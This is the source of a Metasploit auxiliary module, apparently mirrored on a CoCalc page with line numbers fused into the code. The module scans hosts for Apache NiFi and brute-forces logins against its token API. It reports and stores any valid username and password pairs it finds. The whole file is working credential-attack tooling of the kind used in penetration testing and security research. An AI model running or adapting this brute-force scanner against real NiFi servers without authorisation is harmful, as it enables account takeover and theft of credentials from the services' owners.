CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/apache_nifi_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::AuthBrute9include Msf::Auxiliary::Report1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Apache NiFi Login Scanner',16'Description' => %q{17This module attempts to take login details for Apache NiFi websites18and identify if they are valid or not.1920Tested against NiFi major releases 1.14.0 - 1.21.0, and 1.13.021Also works against NiFi <= 1.13.0, but the module needs to be adjusted:22set SSL false23set rport 808024},25'License' => MSF_LICENSE,26'Author' => [27'h00die', # msf module28],29'Notes' => {30'Stability' => [CRASH_SAFE],31'Reliability' => [],32'SideEffects' => [IOC_IN_LOGS]33}34)35)36register_options(37[38Opt::RPORT(8443),39OptString.new('TARGETURI', [ true, 'The URI of the Apache NiFi Application', '/'])40]41)42register_advanced_options([43OptBool.new('SSL', [true, 'Negotiate SSL connection', true])44])45end4647def report_cred(opts)48service_data = {49address: opts[:ip],50port: opts[:port],51service_name: opts[:service_name],52protocol: 'tcp',53workspace_id: myworkspace_id54}5556credential_data = {57origin_type: :service,58module_fullname: fullname,59username: opts[:user],60private_data: opts[:password],61private_type: :password62}.merge(service_data)6364login_data = {65core: create_credential(credential_data),66status: Metasploit::Model::Login::Status::SUCCESSFUL,67last_attempted_at: DateTime.now,68proof: opts[:proof]69}.merge(service_data)7071create_credential_login(login_data)72end7374def run_host(ip)75vprint_status("Checking #{ip}")76res = send_request_cgi!(77'uri' => normalize_uri(target_uri.path, 'nifi', 'login')78)7980fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?81fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 2008283fail_with(Failure::NotVulnerable, "Apache NiFi not detected on #{ip}") unless res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}8485res = send_request_cgi!(86'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'config')87)88fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?89fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 2009091res_json = res.get_json_document9293unless res_json.dig('config', 'supportsLogin')94print_error("#{peer} - User login not supported, try visiting /nifi to gain access")95return96end9798each_user_pass do |user, pass|99res = send_request_cgi!(100'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'token'),101'method' => 'POST',102'vars_post' => {103'username' => user,104'password' => pass105}106)107fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?108if res.code == 201109print_good("#{peer} - Apache NiFi - Login successful as '#{user}' with password '#{pass}'")110report_cred(111ip: rhost,112port: rport,113service_name: (ssl ? 'https' : 'http'),114user: user,115password: pass,116proof: res.body.to_s117)118elsif res.code == 409119fail_with(Failure::BadConfig, "#{peer} - Logins only accepted on HTTPS")120else121vprint_error("#{peer} - Apache NiFi - Failed to login as '#{user}' with password '#{pass}'")122end123end124end125end126127128